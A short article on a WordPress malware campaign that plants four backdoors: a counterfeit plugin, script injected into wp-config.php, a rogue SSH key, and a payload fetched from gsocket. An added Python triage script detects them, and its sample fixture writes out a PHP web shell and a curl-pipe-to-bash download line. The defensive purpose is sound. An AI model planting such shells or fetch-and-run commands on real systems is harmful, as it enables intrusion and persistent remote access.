Thousands of WordPress websites infected with malware

The malicious software comprises four distinct backdoors.

Four backdoors give the attackers several avenues of re-entry if one of them is detected and removed. This is something we have not encountered previously. It also demonstrates a further class of attack made possible by websites that do not monitor the third-party dependencies loaded into their users' browsers.

The four backdoors and what each one does:

  • Backdoor 1 uploads and installs a counterfeit plugin named “Ultra SEO Processor”, which is then used to run commands issued by the attacker.
  • Backdoor 2 injects malicious JavaScript into wp-config.php. That file is a PHP configuration file and never legitimately contains script tags, so any JavaScript found there is an indicator of compromise.
  • Backdoor 3 adds an attacker-controlled SSH key to the ~/.ssh/authorized_keys file to keep persistent remote access to the host, independent of the web application.
  • Backdoor 4 executes commands remotely and fetches a further payload from gsocket[.]io, most likely to open a reverse shell.

Because the persistence is spread across the plugin directory, wp-config.php, the web user's SSH configuration and an external download, cleaning only one of these locations leaves the others in place. All four must be checked before a site can be considered clean.
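A triage script covering the four locations listed above, written as an added example for this page (it is not code from the article or from the researchers it reports on). It checks the plugin headers for the counterfeit plugin name, wp-config.php for script tags and eval/base64_decode calls, authorized_keys for any key blob not on an allowlist, and every file under the install for a reference to the gsocket download host. The sample WordPress tree, plugin file names, key blobs and injected lines are constructed for the demo and are not real captured artefacts; the indicator patterns beyond the article's own names (eval, base64_decode, the authorized_keys option handling) are the author's assumptions.

```python
# Added triage script (not from the page or its source): walks a WordPress install and a
# user's authorized_keys for the four persistence mechanisms listed above.
# All paths, plugin headers, key blobs and sample content below are constructed for the demo.
import re
import tempfile
from pathlib import Path

ROGUE_PLUGIN_NAME = "ultra seo processor"           # from the article; matched case-insensitively
INJECT_RE = re.compile(r"<script\b|\beval\s*\(|base64_decode\s*\(", re.I)  # assumed indicators
GSOCKET_RE = re.compile(r"gsocket\W{1,3}io", re.I)  # matches gsocket.io and defanged gsocket[.]io


def rogue_plugins(wp_root: Path) -> list[str]:
    """Plugin directories whose header declares the counterfeit plugin name (Backdoor 1)."""
    plugins = wp_root / "wp-content" / "plugins"
    if not plugins.is_dir():
        return []
    hits = []
    for d in sorted(p for p in plugins.iterdir() if p.is_dir()):
        for php in d.glob("*.php"):
            m = re.search(r"Plugin Name:\s*(.+)", php.read_text(errors="ignore")[:4096])
            if m and ROGUE_PLUGIN_NAME in m.group(1).lower():
                hits.append(d.name)
                break
    return hits


def injected_lines(wp_config: Path) -> list[int]:
    """Line numbers in wp-config.php carrying script tags, eval() or base64_decode() (Backdoor 2).
    A stock wp-config.php contains none of these."""
    return [n for n, line in enumerate(wp_config.read_text(errors="ignore").splitlines(), 1)
            if INJECT_RE.search(line)]


def unknown_ssh_keys(authorized_keys: Path, allowed_blobs: set[str]) -> list[str]:
    """Keys whose base64 blob is not on the allowlist (Backdoor 3).
    Skips leading option strings such as no-pty or command="..." by locating the key-type token."""
    unknown = []
    for line in authorized_keys.read_text().splitlines():
        toks = line.split()
        if not toks or toks[0].startswith("#"):
            continue
        for i, tok in enumerate(toks[:-1]):
            if tok.startswith(("ssh-", "ecdsa-", "sk-")):
                if toks[i + 1] not in allowed_blobs:
                    unknown.append(" ".join(toks[i:i + 3]))   # type, blob, comment
                break
    return unknown


def gsocket_references(wp_root: Path) -> list[str]:
    """Files under the install that reference the gsocket download host (Backdoor 4)."""
    return sorted(p.relative_to(wp_root).as_posix() for p in wp_root.rglob("*")
                  if p.is_file() and GSOCKET_RE.search(p.read_text(errors="ignore")))


def triage(wp_root: Path, authorized_keys: Path, allowed_blobs: set[str]) -> dict:
    """Run all four checks; an empty list for every key means nothing was found."""
    return {
        "rogue_plugins": rogue_plugins(wp_root),
        "wp_config_injected_lines": injected_lines(wp_root / "wp-config.php"),
        "unknown_ssh_keys": unknown_ssh_keys(authorized_keys, allowed_blobs),
        "gsocket_references": gsocket_references(wp_root),
    }


# --- constructed sample install; none of this is real captured data ---------------------
GOOD_KEY = "AAAAC3NzaC1lZDI1NTE5AAAAIGoodKeyForTheAdminWorkstation00000000000000000000"
BAD_KEY = "AAAAC3NzaC1lZDI1NTE5AAAAIAttackerControlledKey0000000000000000000000000000"


def build_sample() -> tuple[Path, Path]:
    """Create a throwaway WordPress tree with one legitimate plugin and all four backdoors."""
    root = Path(tempfile.mkdtemp(prefix="wp-"))
    plugins = root / "wp-content" / "plugins"
    (plugins / "akismet").mkdir(parents=True)
    (plugins / "akismet" / "akismet.php").write_text("<?php\n/*\nPlugin Name: Akismet Anti-spam\n*/\n")
    (plugins / "ultra-seo").mkdir()                          # directory name is assumed
    (plugins / "ultra-seo" / "ultra-seo.php").write_text(
        "<?php\n/*\nPlugin Name: Ultra SEO Processor\n*/\n"
        "if (isset($_POST['c'])) { system($_POST['c']); }\n")
    (root / "wp-config.php").write_text(
        "<?php\ndefine('DB_NAME', 'wp');\n"
        "?><script src='https://cdn.example.invalid/t.js'></script><?php\n"
        "require_once ABSPATH . 'wp-settings.php';\n")
    (root / "wp-content" / "uploads").mkdir()
    (root / "wp-content" / "uploads" / "cache.php").write_text(
        "<?php shell_exec('curl -sL https://gsocket[.]io/x | bash');\n")
    ak = root / "authorized_keys"                            # stands in for ~/.ssh/authorized_keys
    ak.write_text(f"ssh-ed25519 {GOOD_KEY} admin@workstation\n"
                  f'no-pty,command="/bin/sh" ssh-ed25519 {BAD_KEY} root@localhost\n')
    return root, ak


def run_demo() -> dict:
    root, ak = build_sample()
    return triage(root, ak, {GOOD_KEY})


if __name__ == "__main__":
    for name, found in run_demo().items():
        print(f"{name}: {found}")
```

On a real host, call triage() with the document root and the web user's ~/.ssh/authorized_keys, seeding allowed_blobs from the keys you can account for. Treat any hit as a reason to examine the other three locations as well, since the article's point is that the backdoors are meant to survive a partial clean-up.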
